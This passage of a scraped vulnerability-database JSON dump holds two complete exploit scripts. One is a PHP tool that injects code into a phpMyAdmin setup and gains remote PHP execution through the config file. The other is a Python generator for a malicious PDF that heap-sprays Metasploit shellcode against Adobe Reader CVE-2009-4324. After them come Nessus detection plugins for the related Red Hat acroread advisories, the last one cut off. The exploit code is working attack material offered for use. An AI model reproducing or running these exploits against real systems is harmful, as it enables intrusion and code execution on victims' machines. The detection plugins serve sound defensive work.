false,\r\n CURLOPT_SSL_VERIFYHOST => false\r\n));\r\noutput(\"[*] Contacting server to retrive session cookie and token.\");\r\n \r\n$result = curl_exec($ch);\r\nif(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){\r\n output(\"[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.\");\r\n killme();\r\n}\r\nif(!$result){\r\n output(\"[!] cURL error:\".curl_error($ch));\r\n killme();\r\n}\r\nif(false !== strpos($result, 'Cannot load or save configuration')){\r\n output(\"[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist.\");\r\n killme();\r\n}\r\n \r\n// Extract cookie\r\npreg_match('/phpMyAdmin=([^;]+)/', $result, $matches);\r\n$cookie = $matches[1];\r\noutput(\"[i] Cookie:\".$cookie);\r\n// Extract token\r\npreg_match('/(token=|token\" value=\")([0-9a-f]{32})/', $result, $matches);\r\n$token = $matches[2];\r\noutput(\"[i] Token:\".$token);\r\n \r\n// Poison _SESSION variable\r\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);\r\ncurl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);\r\noutput(\"[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.\");\r\nif(!$result = curl_exec($ch)){\r\n output(\"[!] cURL error:\".curl_error($ch));\r\n killme();\r\n}\r\n \r\n//echo htmlspecialchars($result,ENT_QUOTES);\r\n \r\n// Save file\r\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');\r\ncurl_setopt($ch, CURLOPT_POST, 1);\r\ncurl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);\r\noutput(\"[*] Contacting server to make it save the injected code to a file.\");\r\nif(!$result = curl_exec($ch)){\r\n output(\"[!] cURL error:\".curl_error($ch));\r\n killme();\r\n}\r\n \r\n//echo htmlspecialchars($result,ENT_QUOTES);\r\n \r\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');\r\ncurl_setopt($ch, CURLOPT_POST, 0);\r\noutput(\"[*] Contacting server to test if the injected code executes.\");\r\nif(!$result = curl_exec($ch)){\r\n output(\"[!] cURL error:\".curl_error($ch));\r\n killme();\r\n}\r\nif(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){\r\n output(\"[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!\");\r\n output(\"[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';\");\r\n}else{\r\n output(\"[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable.\");\r\n}\r\n \r\n \r\ncurl_close($ch);\r\n \r\nfunction output($msg){\r\n echo php_sapi_name()!=='cli'?htmlspecialchars(\"$msg\\n\",ENT_QUOTES):\"$msg\\n\";\r\n flush();\r\n}\r\n \r\nfunction killme(){\r\n output(\"[*] Exiting...\");\r\n echo php_sapi_name()!=='cli'?'<pre>':'';\r\n die();\r\n}\r\n \r\necho php_sapi_name()!=='cli'?'<pre>':'';?>\r\n\r\n\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16503"}], "seebug": [{"lastseen": "2017-11-19T16:13:06", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-67248", "id": "SSV:67248", "title": "Adobe Reader and Acrobat", "type": "seebug", "sourceData": "\n #\r\n# Author : Ahmed Obied (ahmed.obied@gmail.com)\r\n#\r\n# This program generates a PDF file that exploits a vulnerability (CVE-2009-4324) \r\n# in Adobe Reader and Acrobat. The generated PDF file was tested using Adobe \r\n# Reader 9.2.0 on Windows XP SP3. The exploit's payload spawns the calculator.\r\n#\r\n# Usage : python adobe_newplayer.py [output file name]\r\n# \r\n\r\nimport sys\r\n\r\nclass PDF:\r\n \r\n def __init__(self):\r\n self.xrefs = []\r\n self.eol = '\\x0d\\x0a'\r\n self.content = ''\r\n self.xrefs_offset = 0\r\n \r\n def header(self):\r\n self.content += '%PDF-1.1' + self.eol \r\n \r\n def obj(self, obj_num, data):\r\n self.xrefs.append(len(self.content))\r\n self.content += '%d 0 obj' % obj_num\r\n self.content += self.eol + '<< ' + data + ' >>' + self.eol\r\n self.content += 'endobj' + self.eol\r\n \r\n def ref(self, ref_num):\r\n return '%d 0 R' % ref_num \r\n \r\n def xref(self):\r\n self.xrefs_offset = len(self.content)\r\n self.content += 'xref' + self.eol\r\n self.content += '0 %d' % (len(self.xrefs) + 1)\r\n self.content += self.eol\r\n self.content += '0000000000 65535 f' + self.eol\r\n for i in self.xrefs:\r\n self.content += '%010d 00000 n' % i\r\n self.content += self.eol\r\n \r\n def trailer(self):\r\n self.content += 'trailer' + self.eol\r\n self.content += '<< /Size %d' % (len(self.xrefs) + 1)\r\n self.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol\r\n self.content += 'startxref' + self.eol\r\n self.content += '%d' % self.xrefs_offset\r\n self.content += self.eol\r\n self.content += '%%EOF'\r\n \r\n def generate(self): \r\n return self.content\r\n\r\nclass Exploit:\r\n \r\n def convert_to_utf16(self, payload):\r\n enc_payload = ''\r\n for i in range(0, len(payload), 2):\r\n num = 0\r\n for j in range(0, 2):\r\n num += (ord(payload[i + j]) & 0xff) << (j * 8)\r\n enc_payload += '%%u%04x' % num\r\n return enc_payload\r\n \r\n def get_payload(self):\r\n # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub\r\n # http://metasploit.com\r\n payload = '\\x31\\xc9\\x83\\xe9\\xdd\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x6f'\r\n payload += '\\x02\\xb1\\x0e\\x83\\xeb\\xfc\\xe2\\xf4\\x93\\xea\\xf5\\x0e\\x6f\\x02\\x3a\\x4b'\r\n payload += '\\x53\\x89\\xcd\\x0b\\x17\\x03\\x5e\\x85\\x20\\x1a\\x3a\\x51\\x4f\\x03\\x5a\\x47'\r\n payload += '\\xe4\\x36\\x3a\\x0f\\x81\\x33\\x71\\x97\\xc3\\x86\\x71\\x7a\\x68\\xc3\\x7b\\x03'\r\n payload += '\\x6e\\xc0\\x5a\\xfa\\x54\\x56\\x95\\x0a\\x1a\\xe7\\x3a\\x51\\x4b\\x03\\x5a\\x68'\r\n payload += '\\xe4\\x0e\\xfa\\x85\\x30\\x1e\\xb0\\xe5\\xe4\\x1e\\x3a\\x0f\\x84\\x8b\\xed\\x2a'\r\n payload += '\\x6b\\xc1\\x80\\xce\\x0b\\x89\\xf1\\x3e\\xea\\xc2\\xc9\\x02\\xe4\\x42\\xbd\\x85'\r\n payload += '\\x1f\\x1e\\x1c\\x85\\x07\\x0a\\x5a\\x07\\xe4\\x82\\x01\\x0e\\x6f\\x02\\x3a\\x66'\r\n payload += '\\x53\\x5d\\x80\\xf8\\x0f\\x54\\x38\\xf6\\xec\\xc2\\xca\\x5e\\x07\\x7c\\x69\\xec'\r\n payload += '\\x1c\\x6a\\x29\\xf0\\xe5\\x0c\\xe6\\xf1\\x88\\x61\\xd0\\x62\\x0c\\x2c\\xd4\\x76'\r\n payload += '\\x0a\\x02\\xb1\\x0e'\r\n return self.convert_to_utf16(payload)\r\n \r\n def get_exploit(self):\r\n exploit = '''\r\n \r\n function spray_heap()\r\n {\r\n var chunk_size, payload, nopsled;\r\n \r\n chunk_size = 0x8000;\r\n payload = unescape("<PAYLOAD>");\r\n nopsled = unescape("<NOP>");\r\n while (nopsled.length < chunk_size)\r\n nopsled += nopsled;\r\n nopsled_len = chunk_size - (payload.length + 20); \r\n nopsled = nopsled.substring(0, nopsled_len);\r\n heap_chunks = new Array();\r\n for (var i = 0 ; i < <CHUNKS> ; i++)\r\n heap_chunks[i] = nopsled + payload;\r\n } \r\n \r\n function trigger_bug()\r\n {\r\n util.printd("1.000000000000000000000000 : 0000000", new Date());\r\n try {\r\n media.newPlayer(null);\r\n } catch(e) {}\r\n util.printd("1.000000000000000000000000 : 0000000", new Date());\r\n }\r\n \r\n spray_heap();\r\n trigger_bug();\r\n \r\n '''\r\n exploit = exploit.replace('<PAYLOAD>', self.get_payload())\r\n exploit = exploit.replace('<NOP>', '%u0d0d%u0d0d')\r\n exploit = exploit.replace('<CHUNKS>', '1200') \r\n return exploit \r\n \r\ndef generate_pdf():\r\n exploit = Exploit()\r\n pdf = PDF()\r\n pdf.header()\r\n pdf.obj(1, '/Type /Catalog /Outlines ' + pdf.ref(2) + ' /Pages ' + pdf.ref(3) + ' /OpenAction ' + pdf.ref(5))\r\n pdf.obj(2, '/Type /Outlines /Count 0') \r\n pdf.obj(3, '/Type /Pages /Kids [' + pdf.ref(4) + '] /Count 1')\r\n pdf.obj(4, '/Type /Page /Parent ' + pdf.ref(3) + ' /MediaBox [0 0 612 792]')\r\n pdf.obj(5, '/Type /Action /S /JavaScript /JS (%s)' % exploit.get_exploit()) \r\n pdf.xref()\r\n pdf.trailer()\r\n return pdf.generate()\r\n \r\ndef main():\r\n if len(sys.argv) != 2:\r\n print 'Usage: python %s [output file name]' % sys.argv[0]\r\n sys.exit(0)\r\n file_name = sys.argv[1]\r\n if not file_name.endswith('.pdf'):\r\n file_name = file_name + '.pdf'\r\n try:\r\n fd = open(file_name, 'w')\r\n fd.write(generate_pdf()) \r\n fd.close()\r\n print '[-] PDF file generated and written to %s' % file_name\r\n except IOError:\r\n print '[*] Error : An IO error has occurred'\r\n print '[-] Exiting ...'\r\n sys.exit(-1)\r\n \r\nif __name__ == '__main__':\r\n main()\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-67248"}], "nessus": [{"lastseen": "2019-12-13T08:52:59", "bulletinFamily": "scanner", "description": "Updated acroread packages that fix multiple security issues and three\nbugs are now available for Red Hat Enterprise Linux 5 Supplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes several vulnerabilities in Adobe Reader. These\nvulnerabilities are summarized on the Adobe Security Advisory\nAPSB10-02 page listed in the References section. A specially crafted\nPDF file could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader when opened.\n(CVE-2009-4324, CVE-2009-3953, CVE-2009-3954, CVE-2009-3955,\nCVE-2009-3959, CVE-2009-3956)\n\nThis update also fixes the following bugs :\n\n* the acroread process continued to run even after closing a PDF file.\nIf multiple PDF files were opened and then closed, the acroread\nprocesses continued to run and consume system resources (up to 100%\nCPU usage). With this update, the acroread process correctly exits,\nwhich resolves this issue. (BZ#473217)\n\n* the PPKLite.api plug-in was missing, causing Adobe Reader to crash\nwhen attempting to open signed PDF files. For such files, if an\nimmediate crash was not observed, clicking on the Signature Panel\ncould trigger one. With this update, the PPKLite.api plug-in is\nincluded, which resolves this issue. (BZ#472975)\n\n* Adobe Reader has been upgraded to version 9.3. (BZ#497957)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. All\nusers of Adobe Reader are advised to install these updated packages,\nwhich contain Adobe Reader version 9.3, which is not vulnerable to\nthese issues and fixes these bugs. All running instances of Adobe\nReader must be restarted for the update to take effect.", "modified": "2019-12-02T00:00:00", "id": "REDHAT-RHSA-2010-0037.NASL", "href": "https://www.tenable.com/plugins/nessus/63911", "published": "2013-01-24T00:00:00", "title": "RHEL 5 : acroread (RHSA-2010:0037)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0037. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63911);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2019/10/25 13:36:14\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n script_bugtraq_id(37331, 37756, 37757, 37758, 37761, 37763);\n script_xref(name:\"RHSA\", value:\"2010:0037\");\n\n script_name(english:\"RHEL 5 : acroread (RHSA-2010:0037)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated acroread packages that fix multiple security issues and three\nbugs are now available for Red Hat Enterprise Linux 5 Supplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes several vulnerabilities in Adobe Reader. These\nvulnerabilities are summarized on the Adobe Security Advisory\nAPSB10-02 page listed in the References section. A specially crafted\nPDF file could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader when opened.\n(CVE-2009-4324, CVE-2009-3953, CVE-2009-3954, CVE-2009-3955,\nCVE-2009-3959, CVE-2009-3956)\n\nThis update also fixes the following bugs :\n\n* the acroread process continued to run even after closing a PDF file.\nIf multiple PDF files were opened and then closed, the acroread\nprocesses continued to run and consume system resources (up to 100%\nCPU usage). With this update, the acroread process correctly exits,\nwhich resolves this issue. (BZ#473217)\n\n* the PPKLite.api plug-in was missing, causing Adobe Reader to crash\nwhen attempting to open signed PDF files. For such files, if an\nimmediate crash was not observed, clicking on the Signature Panel\ncould trigger one. With this update, the PPKLite.api plug-in is\nincluded, which resolves this issue. (BZ#472975)\n\n* Adobe Reader has been upgraded to version 9.3. (BZ#497957)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. All\nusers of Adobe Reader are advised to install these updated packages,\nwhich contain Adobe Reader version 9.3, which is not vulnerable to\nthese issues and fixes these bugs. All running instances of Adobe\nReader must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3953\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3954\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3955\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3956\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3959\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-4324\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb10-02.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb10-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0037\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread and / or acroread-plugin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0037\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"acroread-9.3-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"acroread-plugin-9.3-1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread / acroread-plugin\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:53:00", "bulletinFamily": "scanner", "description": "The acroread packages as shipped in Red Hat Enterprise Linux 3 Extras\ncontain security flaws and should not be used.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nAdobe Reader 8.1.7 is vulnerable to critical security flaws and should\nno longer be used. A specially crafted PDF file could cause Adobe\nReader to crash or, potentially, execute arbitrary code as the user\nrunning Adobe Reader when opened. (CVE-2009-4324, CVE-2009-3953,\nCVE-2009-3954, CVE-2009-3955, CVE-2009-3959, CVE-2009-3956)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. Adobe\nReader 9 for Linux is not compatible with Red Hat Enterprise Linux 3.\nAn alternative PDF file viewer available in Red Hat Enterprise Linux 3\nis xpdf.\n\nThis update removes the acroread packages due to their known security\nvulnerabilities.", "modified": "2019-12-02T00:00:00", "id": "REDHAT-RHSA-2010-0060.NASL", "href": "https://www.tenable.com/plugins/nessus/63914", "published": "2013-01-24T00:00:00", "title": "RHEL 3 : acroread (RHSA-2010:0060)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0060. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63914);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/10/25 13:36:14\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n script_bugtraq_id(37331, 37758);\n script_xref(name:\"RHSA\", value:\"2010:0060\");\n\n script_name(english:\"RHEL 3 : acroread (RHSA-2010:0060)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The acroread packages as shipped in Red Hat Enterprise Linux 3 Extras\ncontain security flaws and should not be used.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nAdobe Reader 8.1.7 is vulnerable to critical security flaws and should\nno longer be used. A specially crafted PDF file could cause Adobe\nReader to crash or, potentially, execute arbitrary code as the user\nrunning Adobe Reader when opened. (CVE-2009-4324, CVE-2009-3953,\nCVE-2009-3954, CVE-2009-3955, CVE-2009-3959, CVE-2009-3956)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. Adobe\nReader 9 for Linux is not compatible with Red Hat Enterprise Linux 3.\nAn alternative PDF file viewer available in Red Hat Enterprise Linux 3\nis xpdf.\n\nThis update removes the acroread packages due to their known security\nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.adobe.com/support/security/bulletins/apsb10-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2010-0060.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread-uninstall package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-uninstall\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"acroread-uninstall-9.3-3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:52:59", "bulletinFamily": "scanner", "description": "Updated acroread packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4 Extras.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes several vulnerabilities in Adobe Reader. These\nvulnerabilities are summarized on the Adobe Security Advisory\nAPSB10-02 page listed in the References section. A specially crafted\nPDF file could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader when opened.\n(CVE-2009-4324, CVE-2009-3953, CVE-2009-3954, CVE-2009-3955,\nCVE-2009-3959, CVE-2009-3956)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. All\nusers of Adobe Reader are advised to install these updated packages,\nwhich contain Adobe Reader version 9.3, which is not vulnerable to\nthese issues. All running instances of Adobe Reader must be restarted\nfor the update to take effect.", "modified": "2019-12-02T00:00:00", "id": "REDHAT-RHSA-2010-0038.NASL", "href": "https://www.tenable.com/plugins/nessus/63912", "published": "2013-01-24T00:00:00", "title": "RHEL 4 : acroread (RHSA-2010:0038)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0038. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63912);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/10/25 13:36:14\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n script_bugtraq_id(37331, 37758);\n script_xref(name:\"RHSA\", value:\"2010:0038\");\n\n script_name(english:\"RHEL 4 : acroread (RHSA-2010:0038)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated acroread packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4 Extras.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes several vulnerabilities in Adobe Reader. These\nvulnerabilities are summarized on the Adobe Security Advisory\nAPSB10-02 page listed in the References section. A specially crafted\nPDF file could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader when opened.\n(CVE-2009-4324, CVE-2009-3953, CVE-2009-3954, CVE-2009-3955,\nCVE-2009-3959, CVE-2009-3956)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. All\nusers of Adobe Reader are advised to install these updated packages,\nwhich contain Adobe Reader version 9.3, which is not vulnerable to\nthese issues. All running instances of Adobe Reader must be restarted\nfor the update to take effect.\"\n );\n script_set_attribute(\n 